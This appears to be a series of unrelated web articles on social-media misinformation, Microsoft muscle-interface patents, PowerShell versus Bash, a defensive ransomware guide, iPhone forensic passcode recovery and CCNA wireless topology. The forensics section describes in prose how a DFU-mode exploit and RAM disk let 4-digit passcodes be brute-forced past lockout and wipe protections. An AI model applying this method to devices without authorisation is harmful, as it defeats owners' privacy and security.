“Gab is the environment more susceptible to misinformation diffusion,” the researchers write, but “information marked either as reliable or questionable do not present significant differences in their spreading patterns.”
Social media struggles with real news
The findings support previous research that demonstrates that on social media, fake news travels faster, further and deeper than real news. That research, conducted by the Massachusetts Institute of Technology (MIT), tracked stories and how they spread on Twitter.
But not all social networks are created equal. Unreliable posts amounted to just 5% of the reliable posts about coronavirus shared on Reddit, 7% on YouTube, and 11% on Twitter, but the figure was much higher on Gab: 70%, according to the research.
And on Gab, those posts drew far more engagement than posts containing reliable information: the volume of engagement with questionable content was 270% greater than the engagement with reliable content.
“Our analysis suggests that information spreading is driven by the interaction paradigm imposed by the specific social media or/and by the specific interaction patterns of groups of users engaged with the topic,” the authors say. | <urn:uuid:a7ecd123-b7e7-4b6e-aa5c-aebea52ac8ef> | CC-MAIN-2022-40 | https://cybernews.com/editorial/how-you-are-reacting-to-coronavirus-depends-on-the-social-media-platform-you-use/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00715.warc.gz | en | 0.957276 | 758 | 2.53125 | 3 |
Over the past 18 years, Microsoft’s Research Division (MSR), a large group of
computer researchers in key locations worldwide, has come up with some
interesting and useful technologies, as well as a few that may seem on the
wackier side of things.
For instance, MSR was largely responsible for creating Microsoft’s (NASDAQ:
MSFT) Surface tabletop computer, which is now beginning to realize the
technology’s practical applications in commercial deployments.
Now, among the most recent developments out of MSR are technologies that
enable a user to control a computer’s interface by merely flexing his or her
muscles. Two recently published Microsoft patent applications seem to be
pointing the way toward what could become practical developments in that area.
The patent applications were published by the U.S. Patent and Trademark
Office (USPTO) on December 31 — the applications were filed in March 2009 and
in June 2008.
According to a video
posted on MSR’s site, muscle-computer interaction could be used to let a user
interact with a computerized device while his or her hands were full through a
technology called “electromyography,” or EMG.
As an example of how it might be used, the video shows a person with both
hands full able to electronically open the trunk of a car without setting
anything down through flexing hand muscles.
One of the two patent applications describes the
technology as a “wearable electromyography-based controller [which] provides a
physical device, worn by or otherwise attached to a user, that directly senses
and decodes electrical signals produced by human muscular activity using surface
electromyography (sEMG) sensors. The resulting electrical signals provide a
muscle-computer interface for use in controlling or interacting with one or more
computing devices or other devices coupled to a computing device.”
The other patent application concerns a system to
train the software to recognize certain finger movements as commands as well as
a training system to enable the software to “learn” which gestures (groups of
muscle flexes) are meaningful.
Since its founding in 1991, MSR has played an often-overlooked role in many
small, and a few larger, technological innovations.
MSR played a role in developing Microsoft’s forthcoming camera-driven games
controller, dubbed Natal, which enables users to control games with
just the movements of their own bodies. Natal is currently slated to launch
commercially in November.
Recently, MSR computer scientists also participated in the development of
automated technologies meant to help identify child pornography online. That
technology, called PhotoDNA,
will be available to Internet service providers through the National Center for
Missing & Exploited Children.
At the same time, some other technologies may seem a little less
practical — at least for now — such as one researcher’s efforts to record every minute of his life for later retrieval.
Another recent patent application aims to make users’ online avatars reflect their human physical conditions
online — so if the user is overweight, the user’s avatar could mirror that.
Microsoft rarely comments on patent applications and whether it has plans to
commercialize particular inventions. A company spokesperson declined to comment
for this article.
Article courtesy of InternetNews.com. | <urn:uuid:7e426763-d1df-4171-a6c5-7ae48d00f44a> | CC-MAIN-2022-40 | https://www.datamation.com/applications/microsoft-seeks-patents-on-muscle-control-of-pcs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00715.warc.gz | en | 0.945098 | 725 | 2.765625 | 3 |
PowerShell vs Bash: What’s the Difference?
If you've followed IT trends for any length of time, you've no doubt come across a few Windows vs. Linux articles. However, pitting these two OSes against one another is not always logical or fair. In most cases it really is an apples and oranges comparison, based on the tasks that are being measured.
Windows and Linux are both very capable operating systems, and each has its own myriad pros and cons that we can debate. But how often do you stop to think about the scripting and automation potential of the two OSes? We decided to look at some of the things that you can do with the scripting functions that ship with Windows and Linux.
A Little History: PowerShell
Windows was never the greatest at automation tasks. This was partially due to the way that it implemented its command line. It was very much a throwback to the familiar DOS prompt that launched Microsoft to being the massive success it is today. But it lacked features when compared to Unix and later Linux systems.
PowerShell is Microsoft's task automation and configuration management framework. It relies on built-in components called cmdlets, and additional functionality is available via modules, which can be installed from the PowerShell Gallery directly from the command line.
PowerShell is different from Bash because it is designed to interact with .NET structures natively in Windows. This means that it can pipe objects and data between scripts, applications and sessions. Each object has its own series of properties, which makes the data handling within PowerShell even more granular. Data can be specified as numbers (integers), words (strings), Boolean (true and false), and many other types. This means that you can get really specific with the way your scripts deal with data input and output.
A Little History: Bash
Linux and Unix systems have always benefited from being structured through a multi-user terminal environment. This means that you can launch additional sessions on the same system, and run scripts and applications without affecting the main sessions that other users are logged in as. This was very different from early Windows and DOS systems that were single user, single session environments until Windows NT came around in the mid 90s.
The original shell that shipped with Unix was known as the Bourne shell, named after its creator Stephen Bourne. Bash (Bourne again Shell) is the open source successor to the Bourne shell. Bash was widely adopted when Linux was created in the early 90s, which is why it is still in use today.
Bash owes its popularity to many features, chief among them system stability and the fact that it is open source. It is found in just about every distribution of Linux because of this. All of these factors make it one of the most used scripting environments for IT professionals today.
When to Use PowerShell
Windows administration has gotten a whole lot easier since PowerShell development became a feature in the Microsoft landscapes. Instead of wrestling with ungainly batch files and the Windows Scheduler, sysadmins have access to a new toolbox of impressive apps and functions.
PowerShell can drill down into fine details to create powerful scripts that work as well as some commercially available applications. PowerShell can pull data straight from the WMI subsystem, giving you real-time, deep-level information on anything from process IDs to handle counts.
PowerShell is plugged into the .NET framework, so you can create great looking menus and winforms that look like legitimate applications. You can use PowerShell to do anything from querying SQL Databases to grabbing your favorite RSS Feeds right into your PowerShell session for further manipulation. It is a real Swiss army knife for system administration within Windows environments.
When to use Bash
If you are running Linux systems, then you know about the need for automating tasks. Early tape drives were used for backups with tar archiving. These operations could be scripted in Bash and then run via a cron schedule. We take this kind of thing for granted today, but many tasks had to be completed manually before environments like Bash were created. Anything to do with file manipulation such as archiving, copying, moving, renaming and deleting files are all right up Bash's alley.
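As a quick sketch of that kind of file manipulation (the directory and file names below are made up for the demo), here is a tiny tar archiving job of the sort you might run from cron:

```shell
# Create a throwaway directory with two files to stand in for real data.
src=$(mktemp -d)
touch "$src/a.log" "$src/b.log"

# -c create, -z gzip compress, -f output file; -C switches into the source dir first.
tar -czf /tmp/demo-backup.tar.gz -C "$src" .

# List the archive contents without extracting, to verify the backup.
tar -tzf /tmp/demo-backup.tar.gz
```

In a real cron job you would point this at your data directory and add a timestamp to the archive name.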
More advanced file manipulation is also possible. You can find files created on certain dates, and which files have CHMOD and owner permissions changed. Bash is also great for creating interactive menus for running scripts and performing system functions. These are crude in the sense that they are run in a non-graphical environment, but they work very well. This is great for sharing your libraries of scripts with others. Running a script from a Bash menu is simply a matter of entering a number and hitting the Enter key.
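A minimal version of such a menu can be built with Bash's built-in `select`; the tasks below are placeholders, and input is fed non-interactively here so the sketch runs end to end:

```shell
# A tiny menu using the `select` builtin; the numbered list is printed automatically.
choose() {
  PS3="Choose a task: "
  select task in "Show date" "Say hello" "Quit"; do
    case $REPLY in
      1) date; break ;;
      2) echo "hello"; break ;;
      3) break ;;
      *) echo "unknown option" >&2 ;;
    esac
  done
}

# Feed option 2 on stdin; interactively you would just type the number and press Enter.
choose <<< "2"
```

Running a script from such a menu really is just a matter of entering a number and hitting the Enter key.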
What Have We Learned?
PowerShell and Bash are similar in some ways, but also very different. Here are four key ways they're different.
PowerShell Handles Data Differently
PowerShell is different from Bash in the way it handles data. PowerShell is a scripting language, but it is able to feed data in different formats in a way that makes it feel like a programming language. PowerShell also deals with scopes in its scripts.
Using scope modifiers such as $global:, $script: and $local: gives your scripts additional flexibility by controlling where variables are visible, allowing values to be handed off to other commands in the same script or PowerShell session. When you really get into PowerShell it becomes a tool that you cannot live without.
Bash is a CLI
Bash is a CLI, which stands for command language interpreter. Like PowerShell, Bash is able to pass data between commands via pipes. That data is sent as plain strings, though, which limits some of the things you can do with the output of your scripts, such as mathematical functions.
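To illustrate (the numbers here are arbitrary), summing values that arrive through a pipe means handing the text to a tool that can do arithmetic, such as awk:

```shell
# Each pipeline stage passes plain text; awk re-parses the lines to do the math.
printf '%s\n' 3 5 7 | awk '{ sum += $1 } END { print sum }'
# prints 15
```

PowerShell, by contrast, pipes the values as typed objects and can sum them directly with a cmdlet such as Measure-Object.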
PowerShell is Both CLI and Language
The default PowerShell Integrated Scripting Environment (ISE) that ships with Windows shows how you can quickly and easily create scripts without sacrificing direct access to a command line. By default, the top section lets you type out your lines of scripting code and quickly test it.
The window below is a PowerShell command line that gives you quick access to run single commands. This gives you the best of both worlds between a scripting language and a command-line shell. The ISE is a great tool to quickly prototype solutions.
PowerShell and Bash are Both Powerful Tools
The environment that you work in will define which tool you choose. Linux systems administrators who script in Bash find it relatively easy to pick up PowerShell scripting. PowerShell scripting skills also translate over to Bash scripting to a certain degree.
The main differences between these two scripting languages are syntax and data handling. If you understand concepts such as variables and functions, then learning either one of these languages starts to make a lot of sense.
Once you start scripting tasks you might be surprised to find yourself addicted to creating tools and automating processes. The key to scripting is understanding the way that your data is handled and how it flows between commands. Learning how to harness pipelines is the first step towards understanding automation, which can lead to DevOps and SecDevOps.
How you get there depends on what you script in. PowerShell and Bash are only the beginning, and they are both excellent places to get started. | <urn:uuid:4db08e00-76d6-473a-bbfb-cae2eb25a76e> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/certifications/microsoft/powershell-vs-bash-whats-the-difference | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00715.warc.gz | en | 0.956386 | 1,488 | 2.859375 | 3 |
Ransomware is a type of malware that encrypts a victim’s data until a payment is made to the attacker. If the payment is made, the victim receives a decryption key to restore access to their files. If the ransom payment is not made, the threat actor publishes the data on data leak sites (DLS) or blocks access to the files in perpetuity.
How a Ransomware Attack Works
- Step 1. Infection: Ransomware operators often using phishing emails and social engineering techniques to infect their victim’s computer. In most cases, the victim ends up clicking a malicious link in the email, introducing the ransomware variant on their device.
- Step 2. Encryption: After a device or system has been infected, ransomware then searches for and encrypts valuable files. Depending on the variant, the malicious software may find opportunities to spread to other devices and systems across the organization.
- Step 3. Ransom Demand: Once the data has been encrypted, a decryption key is required to unlock the files. In order to get the decryption key, the victim must follow the instructions left on a ransom note that outline how to pay the attacker – usually in Bitcoin.
Types of Ransomware
Encrypting Ransomware: In this instance the ransomware systematically encrypts files on the system’s hard drive, which become difficult to decrypt without paying the ransom for the decryption key. Payment is demanded via Bitcoin, MoneyPak, PaySafeCard, Ukash or a prepaid (debit) card.
Screen Lockers: Lockers completely lock you out of your computer or system, so your files and applications are inaccessible. A lock screen displays the ransom demand, possibly with a countdown clock to increase urgency and drive victims to act.
Scareware: Scareware is a tactic that uses popups to convince victims they have a virus and directs them to download fake software to fix the issue.
Example Ransomware Variants
| Variant | Description |
| --- | --- |
| CryptoLocker | CryptoLocker ransomware was revolutionary in both the number of systems it impacted and its use of strong cryptographic algorithms. The group primarily leveraged their botnet for banking-related fraud. |
| NotPetya | NotPetya combines ransomware with the ability to propagate itself across a network. It spreads to Microsoft Windows machines using several propagation methods, including the EternalBlue exploit for the CVE-2017-0144 vulnerability in the SMB service. |
| Ryuk | WIZARD SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. |
| REvil (Sodinokibi) | Sodinokibi/REvil ransomware is commonly associated with the threat actor PINCHY SPIDER and its affiliates operating under a ransomware-as-a-service (RaaS) model. |
| WannaCry | WannaCry has targeted healthcare organizations and utility companies using a Microsoft Windows exploit called EternalBlue, which allowed for the sharing of files, thus opening a door for the ransomware to spread. |
| Conti | Conti's utilization of compiler-based obfuscation techniques, such as ADVobfuscator, provides code obfuscation when the ransomware's source code is built. Portions of Conti's source code are restructured or rewritten regularly with the intention of avoiding detection and disrupting automated malware analysis systems. |
Should You Pay the Ransom?
The FBI does not support paying a ransom in response to a ransomware attack. They argue paying a ransom not only encourages the business model, but it also may go into the pockets of terror organizations, money launderers, and rogue nation-states. Moreover, while few organizations publicly admit to paying ransoms, adversaries will publicize that info on the dark web – making it common knowledge for other adversaries looking for a new target.
Paying the ransom doesn’t result in a faster recovery or a guaranteed recovery. There may be multiple decryption keys, there may be a bad decryption utility, the decryptor may be incompatible with the victim’s operating system, there may be double decryption and the decryption key only works on one layer, and some data may be corrupted. Less than half of ransomware victims are able to successfully restore their systems.
Ransomware Prevention and Defense Tips
Once ransomware encryption has taken place, it’s often too late to recover that data. That’s why the best ransomware defense relies on proactive prevention.
Ransomware is constantly evolving, making protection a challenge for many organizations. Follow these best practices to help keep your operations secure:
1. Train all employees on cybersecurity best practices:
Your employees are on the front line of your security. Make sure they follow good hygiene practices — such as using strong password protection, connecting only to secure Wi-Fi and never clicking on links from unsolicited emails.
2. Keep your operating system and other software patched and up to date:
Cybercriminals are constantly looking for holes and backdoors to exploit. By vigilantly updating your systems, you’ll minimize your exposure to known vulnerabilities.
3. Implement and Enhance Email Security
CrowdStrike recommends implementing an email security solution that conducts URL filtering and also attachment sandboxing. To streamline these efforts, an automated response capability can be used to allow for retroactive quarantining of delivered emails before the user interacts with them.
4. Continuously monitor your environment for malicious activity and IOAs:
Endpoint detection and response (EDR) acts like a surveillance camera across all endpoints, capturing raw events for automatic detection of malicious activity not identified by prevention methods and providing visibility for proactive threat hunting.
5. Integrate threat intelligence into your security strategy:
Monitor your systems in real time and keep up with the latest threat intelligence to detect an attack quickly, understand how best to respond, and prevent it from spreading.
6. Develop Ransomware-Proof Offline Backups
When developing a ransomware-proof backup infrastructure, the most important idea to consider is that threat actors have targeted online backups before deploying ransomware to the environment.
For these reasons, the only sure way of salvaging data during a ransomware attack is through ransomware-proof backups. For example, maintaining offline backups of your data allows for a quicker recovery in emergencies.
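As a minimal sketch of the verification side of such a backup (paths and file names are illustrative, and a true offline backup would be written to detached media), an archive can be paired with a checksum so that a restore can be validated later:

```shell
# Stage some sample data, archive it, and record a SHA-256 checksum alongside it.
src=$(mktemp -d)
echo "customer records" > "$src/db.txt"
tar -czf /tmp/offline-backup.tar.gz -C "$src" .
sha256sum /tmp/offline-backup.tar.gz > /tmp/offline-backup.sha256

# Before restoring, confirm the archive has not been corrupted or tampered with.
sha256sum -c /tmp/offline-backup.sha256
```

Keeping the checksum file with the offline copy lets you prove the backup's integrity before trusting it during incident recovery.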
7. Implement a robust identity protection program:
Organizations can improve their security posture by implementing a robust identity protection program: understand the hygiene of on-premises and cloud identity stores (for example, Active Directory and Azure AD), identify gaps, analyze behavior and deviations for every workforce account (human users, privileged accounts, service accounts), detect lateral movement, and implement risk-based conditional access to detect and stop ransomware threats.
How to Respond to a Ransomware Attack
Once ransomware penetrates a device on your network, it can wreak havoc – causing disruption that grinds business operations to a halt. With company and client data, financial wellbeing and brand reputation at stake, knowing what to do if you get ransomware is critical.
If you do encounter ransomware, it’s important to:
1. Find the infected device(s): if ransomware penetrates your network, it’s important to identify and isolate any infected devices immediately – before the breach spreads to the rest of the network.
First, look for any suspicious activity on the network, such as files being renamed or file extensions changing. It’s likely that the system was breached through human error – for example, an employee clicking a suspicious link in a phishing email – so employees can be a useful source of information. Ask if anyone has received or spotted any suspicious activity that may help pinpoint infected devices.
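The file-renaming activity described above can be spotted with a simple sweep for extensions that known ransomware families append to encrypted files. The extension list below is a small illustrative sample, not an exhaustive or authoritative one.

```python
from pathlib import Path

# Small illustrative sample of extensions appended by known ransomware
# families; real monitoring tools track hundreds of these.
SUSPICIOUS_EXTENSIONS = {".locky", ".crypt", ".encrypted", ".locked"}

def find_suspicious_files(root: Path) -> list:
    """Recursively list files whose extension suggests ransomware encryption."""
    return [p for p in root.rglob("*")
            if p.is_file() and p.suffix.lower() in SUSPICIOUS_EXTENSIONS]
```

A sudden spike in hits from a sweep like this is exactly the early-warning signal that justifies isolating a device.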
2. Stop ransomware in its tracks: the difference between a business-sinking infection and a minor network interruption can come down to reaction time. Businesses must swiftly cut or restrict network access to stop the spread from infected devices.
If possible, every device connected to the network – both on and off-site – should be disconnected. If necessary, disable any wireless connectivity, too – including Wi-Fi and Bluetooth – as this helps stop a ransomware infection from traversing the network, seizing, and encrypting crucial data.
3. Review the extent of the problem: it’s important to understand the extent of the damage caused by the breach to prepare an appropriate response.
Examine all devices connected to the network. Initial symptoms of ransomware encryption include file name changes and employees struggling to access files. Any devices displaying these signs should be noted – and immediately disconnected from the network – and may lead you to the gateway device where the infection first gained access to the network.
Build a list of infected devices and data centers. The business’s remediation process should cover every compromised device, so that the encryption process cannot restart when you return to work.
4. Look to your backups: in a day and age where cybersecurity risks lurk around every corner, having backups of all your digital data – separated from the centralized network – is crucial to getting things up and running again quickly, and minimizing downtime, in the event of a breach.
Once all devices have been decrypted and fitted with antivirus software, it’s time to turn to your backup data to restore any compromised files.
However, before you do, run a quick check on any backup files. The increasing sophistication and resilience of modern ransomware means these files may also have been corrupted and rolling this data out to the network could simply put you back to step one.
5. Report the attack: while the immediate priority post-breach is to stop the spread and start the recovery phase, consideration must also be given to the wider consequences of the attack. Compromised data not only impacts the business but also its employees and clients.
As ransomware typically involves the threat of data leaks, any attack should be reported to the relevant authorities as soon as possible.
Comprehensive data-protection legislation doesn’t really exist at the US federal level. However, a mix of individual state laws and some sector-specific federal regulations impose strict fines for violating data compliance requirements. If you suffer a data breach in California, for example, you must report it under the CCPA, and each violation can result in fines of up to $7,500.
Ransomware and other forms of malware should also be reported to law enforcement authorities, who can help identify those responsible and prevent future attacks.
Ransomware Removal – What to do After a Ransomware Attack
If the worst happens and individual company devices or even your entire network is compromised by ransomware, there are a few recovery options available.
Common strategies for ransomware removal include:
- Attempting to remove ransomware using software
- Paying the ransom
- Resetting infected devices to factory mode
It’s not recommended that you pay the ransom. Cybercriminals cannot be trusted to decrypt and return access to the data, even after you’ve paid. And at worst, you may even be listed as a target for future malware attacks if malicious actors know you’re likely to give in to their demands.
Plus, successful ransomware attacks only encourage more criminals to enter a potentially lucrative space, worsening the problem for everyone.
Instead, restrict network access to any compromised devices – and those displaying suspicious behavior – and aim to stop the further spread of the ransomware.
Tips for ransomware removal include:
- Reboot to safe mode – depending on the type of ransomware, rebooting the device and restarting it in safe mode can halt the spread. Although some strains like ‘REvil’ and ‘Snatch’ can operate during a safe-mode boot, this isn’t true of all ransomware, and safe mode can buy you valuable time to install anti-malware software. However, it’s important to note that any encrypted files will remain encrypted even in safe mode and will need to be restored from a data backup.
- Install anti-ransomware software – once the infected device(s) have been identified and disconnected from the network, the ransomware needs to be removed using anti-malware software. If you attempt business as usual before the devices are fully decrypted, you risk a resurgence of the undetected malware, resulting in further spread and more compromised files.
- Scan for ransomware programs – when you believe your devices are clear of any ransomware or other malware, make sure you scan the system – both by manually searching for suspicious behaviour like file extension changes and by using next-generation firewalls. A thorough scan should reveal any hidden malware that could wreak havoc again once you restore your computer.
- Restore the computer – businesses should always keep backups of their files, isolated away from the network. This way, any encrypted files can be quickly restored from a safe source once the ransomware is removed, minimising downtime and disruption.
- Report the attack to law enforcement – ransomware attackers are cybercriminals. Any attack needs to be documented and reported – it shouldn’t be something companies simply let slide once they’ve managed to restore their devices. Log screenshots or take pictures of any ransom notes and gather all available evidence – like emails or websites that could potentially be the source of the malware – and report the breach to the relevant authorities as soon as possible.
1234, 0000, 2580, 1111, 5555, 2222, and 1212 – whilst not the strongest of PIN passcodes, statistics show that these are amongst the most common codes used by mobile phone users worldwide. There are limitations posed by the PIN lock feature, as those of you who have enquired with us regarding the Apple iPhone will be aware. The level of background security developed by Apple has proven troublesome for digital forensic experts and law enforcement worldwide. The US National Security Agency has recently deemed the smartphone secure enough for governmental use, after many failed attempts at accessing the device. You’ll now find that UK government departments and many top commercial organisations have ditched their existing BlackBerry smartphones for the Apple iPhone. But why is the iPhone’s security so good? And what can IntaForensics do to try and bypass it?
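As an aside, screening user-chosen PINs against the common codes quoted above is trivial to implement. The deny-list here is exactly the one in the opening sentence; a real screening tool would use a far longer list.

```python
# The common PINs quoted above; a real deny-list would be far longer.
COMMON_PINS = {"1234", "0000", "2580", "1111", "5555", "2222", "1212"}

def is_weak_pin(pin: str) -> bool:
    """Flag PINs that are on the common list or use a single repeated digit."""
    return pin in COMMON_PINS or len(set(pin)) == 1
```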
Back in 2007, the original iPhone was laughed at by the hacking community for its poor implementation of security features. Essentially, every application written by Apple ran with root privileges, allowing complete control over the entire phone. Therefore, hackers could access and take over the phone from the inside. This was rectified the following year, and since then Apple has built upon the security of its smartphone, changing the way apps are programmed and introducing additional security features year on year. This makes it one of the most secure smartphones on the market.
The iPhone has always included the PIN lock feature, but only since the 3GS has this feature been strong enough to prevent serious attacks. Annual developments in both hardware and software continue to strengthen the link between the two and in turn improve security. Apple has also implemented an optional feature within iOS devices: the device can automatically wipe itself after a certain number of failed PIN attempts. This reduces the risk of information being leaked if the iOS device is lost or stolen. Because of this feature, specific mobile forensic equipment is necessary for safe access to the data.
This hardware security involves the incorporation of the AES encryption algorithm. AES encryption has been in use since the 1990s and is widely regarded as the most secure form of encryption available, adopted by the US National Security Agency for encrypting classified data. It is widely thought that no computer in the foreseeable future will be able to break a random 256-bit AES key in a realistic timescale.
Apple has stated that the AES key within each iPhone or iPad is unique to each device and is considered to be a truly random key generated by the system’s random number generator. This unique key is not recorded by Apple or any of its suppliers, to maintain total security. Apple strengthened its use of AES encryption by placing the hardware that encrypts the data between the flash storage and the iPhone’s main memory, meaning that data requested from the internal flash memory is automatically decrypted, and encrypted again when saved back to it. In addition, the AES 256-bit keys are fused into the application processor during manufacturing. Apple burns these keys into the silicon, preventing them from being tampered with or bypassed; only the AES engine can access them.
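The scale of a random 256-bit key can be sketched in a few lines. Here `secrets` draws from the operating system's cryptographically secure random number generator, standing in for the dedicated hardware generator Apple describes — it is an illustration of key size, not of Apple's implementation.

```python
import secrets

# A random 256-bit (32-byte) key, drawn from the OS's CSPRNG -- a software
# stand-in for the dedicated hardware generator described above.
key = secrets.token_bytes(32)

# The size of the keyspace a brute-force attack would have to search:
# roughly 1.16 * 10**77 candidate keys.
KEYSPACE = 2 ** 256
```

That keyspace is why brute-forcing the AES key itself is hopeless, and why attacks focus on the much smaller passcode instead.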
What we do
Recovery of iPhone, iPad and iPod Touch passcodes is possible on a number of models, but not all. Data is recovered by first putting the device into DFU (Device Firmware Update) mode. This mode is primarily used to connect to iTunes to allow firmware to be updated on devices which have become corrupt. From DFU mode, an exploit is used in combination with a custom kernel and a RAM disk. This exploit is very similar to how a handset is “jailbroken”, the main difference being that all data is loaded into RAM and not onto the handset’s internal memory. This allows tools to be executed to create a physical image of the device, recover the device’s secret files, and brute-force the device passcode in order to bypass it.
Brute force is a method of attempting every single passcode from 0000 to 9999 on the handset. The passcode is brute-forced at a level below the operating system, with far greater speed. If you were to manually brute-force the passcode on the device, it would automatically lock the handset after 10 unsuccessful attempts; or, if the user has set up the option to automatically erase the phone, that would occur instead. Using the RAM disk bypasses this limitation. If time is critical, it is possible to bypass a passcode completely, which is particularly useful on devices with a complex passcode set.
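The 4-digit keyspace mentioned above is tiny — only 10,000 candidates. A sketch of the enumeration, with a stand-in check function, shows why removing the retry limit makes the attack trivial.

```python
from itertools import product

def brute_force_pin(check):
    """Try every 4-digit PIN from 0000 to 9999 until `check` accepts one.

    `check` stands in for the low-level passcode test that runs below the
    OS, where the 10-attempt lockout and auto-erase never trigger.
    """
    for digits in product("0123456789", repeat=4):
        candidate = "".join(digits)
        if check(candidate):
            return candidate
    return None  # exhausted the keyspace without a match
```

At even a modest rate of attempts per second, all 10,000 candidates fall in minutes — which is why longer, complex passcodes matter so much more than the lockout counter.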
The extraction of data from iOS devices is undoubtedly a complex and dynamic process, and with ever-changing security being implemented, the IntaForensics team have to be on the ball with new iOS software and hardware releases. Although access to the phone varies by device, it is important to keep your information secure.
If you’re interested in finding out whether the IntaForensics experts could help you with Mobile Phone Analysis or Data Recovery, simply give us a call on 0845 009 2600. You can also send us an email at firstname.lastname@example.org with further details about your enquiry, and we’ll be in touch as soon as possible.
Cisco CCNA 802.11 Topology Building Blocks
Following is a summary of the different WLAN topologies:
Ad hoc mode: This mode is called Independent Basic Service Set (IBSS). Mobile clients connect directly without an intermediate access point. Operating systems such as Windows have made this peer-to-peer network easy to set up. This setup can be used for a small office (or home office) to allow a laptop to be connected to the main PC or for several people to simply share files. The coverage is limited. Everyone must be able to hear everyone else. An access point is not required. A problem is that peer-to-peer networks are difficult to secure.
Infrastructure mode: In infrastructure mode, where clients connect through an access point, there are two modes:
– Basic Service Set (BSS): The communication devices that create a BSS are mobile clients using a single access point for connectivity to each other or to wired network resources. This should not be confused with the Basic Service Set Identifier (BSSID), which is simply the Layer 2 MAC address of the BSS access point’s radio card. While the BSS is the single building block for wireless topology and the BSS access point is uniquely identified through a BSSID, the wireless network itself is advertised through a Service Set Identifier (SSID). The SSID is a user-configurable wireless network name. The SSID can be made up of as many as 32 case-sensitive characters to announce the availability of the wireless network to mobile clients.
– Extended Services Set (ESS): The wireless topology is extended with two or more Basic Service Sets connected by a distribution system (DS) or commonly a wired infrastructure. An ESS generally includes a common SSID to allow roaming from access point to access point without requiring client configuration.
These are the topologies defined by the original 802.11 standard; other topologies such as repeaters, bridges, and workgroup bridges are vendor-specific extensions.
Cisco CCNA BSA Wireless Topology—Basic Coverage
The physical area of radio frequency (RF) coverage provided by an access point in a BSS is known as the basic service area (BSA). This area depends on the RF signal created, with variations caused by access point power output, antenna type, and physical surroundings affecting the RF. While the BSS is the topology building block and the BSA is the actual coverage pattern, the two terms are commonly used interchangeably in basic wireless discussions.
The access point attaches to the Ethernet backbone and communicates with all the wireless devices in the cell area. The access point is the master for the cell and controls traffic flow to and from the network. The remote devices do not communicate directly with each other; they communicate with the access point. The access point is user-configurable with its unique RF channel and wireless SSID name.
The access point broadcasts the name of the wireless cell in the SSID through beacons. Beacons are broadcasts that the access points send to announce the available services. The SSID is used to logically separate WLANs, and it must match exactly between the client and the access point. However, clients can be configured without an SSID (null SSID), detect all access points, and learn the SSID from the beacons of the access point. A common example of the discovery process is the integrated Windows Zero Configuration (WZC) utility when using a wireless laptop at a new location. The user is simply shown the newly found wireless service and asked to connect or to supply appropriate keying material to join. SSID broadcasts can be disabled on the access point, but this approach does not work if the client needs to see the SSID in the beacon.
Cisco CCNA ESA Wireless Topology—Extended Coverage
If a single cell does not provide enough coverage, any number of cells can be added to extend the range. This range is known as an extended service area (ESA).
It is recommended that the ESA cells have 10 to 15 percent overlap to allow remote users to roam without losing RF connections. For wireless voice networks, an overlap of 15 to 20 percent is recommended. Bordering cells should be set to different non-overlapping channels for best performance.
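In the 2.4 GHz band, two channels must be at least five channel numbers apart to avoid overlap, which is why 1, 6, and 11 are the classic non-overlapping set. A small check of a cell channel plan, under that spacing rule:

```python
def channels_overlap(a: int, b: int) -> bool:
    """2.4 GHz channels overlap unless they are at least 5 numbers apart."""
    return abs(a - b) < 5

def plan_is_clean(channels) -> bool:
    """True if no two cells in the plan use overlapping channels."""
    return all(not channels_overlap(c1, c2)
               for i, c1 in enumerate(channels)
               for c2 in channels[i + 1:])
```

Bordering cells assigned 1, 6, and 11 pass this check; a plan such as 1, 4, 11 does not.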
Cisco CCNA Wireless Topology Data Rates—802.11b
WLAN clients have the ability to shift data rates while moving. This technique allows the same client operating at 11 Mbps to shift to 5.5 Mbps, 2 Mbps, and finally still communicate in the outside ring at 1 Mbps. This rate shifting happens without losing the connection and without any interaction from the user. Rate shifting also happens on a transmission-by-transmission basis; therefore, the access point has the ability to support multiple clients at multiple speeds depending upon the location of each client.
– Higher data rates require stronger signals at the receiver. Therefore, lower data rates have a greater range.
– Wireless clients always try to communicate with the highest possible data rate.
– The client will reduce the data rate only if transmission errors and transmission retries occur.
This approach provides the highest total throughput within the wireless cell. The above visual is for 802.11b; however, the same concept applies to 802.11a or 802.11g data rates.
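Rate shifting can be sketched as a mapping from received signal strength to the highest sustainable 802.11b rate. The RSSI thresholds below are illustrative assumptions only — real radios derive them from chipset-specific receiver sensitivity.

```python
# Illustrative RSSI (dBm) thresholds only; real radios use
# chipset-specific receiver-sensitivity figures.
RATE_THRESHOLDS = [   # (minimum RSSI, 802.11b rate in Mbps)
    (-70, 11.0),
    (-76, 5.5),
    (-82, 2.0),
    (-88, 1.0),
]

def select_rate(rssi_dbm: float):
    """Pick the highest 802.11b data rate the signal can sustain."""
    for minimum, rate in RATE_THRESHOLDS:
        if rssi_dbm >= minimum:
            return rate
    return None  # out of range -- the client loses association
```

Because the decision is re-evaluated per transmission, a client walking away from the access point steps down through 11, 5.5, 2, and 1 Mbps without any user interaction — exactly the behaviour described above.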
Cisco CCNA Access Point Configuration
Wireless access points can be configured through a command-line interface or, more commonly, a browser GUI. However, whichever mode of configuration is used, the basic wireless parameters are the same. Basic wireless access point parameters are the SSID, the RF channel (with optional power), and authentication (security), while basic wireless client parameters only include authentication. Wireless clients need fewer parameters since the wireless NIC will scan all available RF it is capable of (meaning an 802.11b/g card cannot scan 5 GHz) to locate the RF channel, and will usually initiate the connection with a null SSID to discover the SSIDs available. Therefore, by 802.11 design, if open authentication is used the result is plug-and-play. When security is configured with pre-shared keys (PSK) for older WEP or current WPA, remember they must be an exact match to allow connectivity.
Depending on the hardware chosen for the access point, it might be capable of both the 2.4 GHz ISM band and the 5 GHz UNII band and all three IEEE 802.11a/b/g implementations. This usually allows fine adjustment of which frequencies to offer, which radio to enable, and which IEEE standard to use on that RF. While details such as 802.11b/g mode versus 802.11g-only mode are not applicable for this course, a basic summary should be observed: when 802.11b wireless clients are mixed with 802.11g wireless clients, the resulting throughput decreases, since the access point must implement an RTS/CTS protection protocol. Hence, if you limit a cell to only one IEEE wireless client type, throughput will be greater than in a mixed mode.
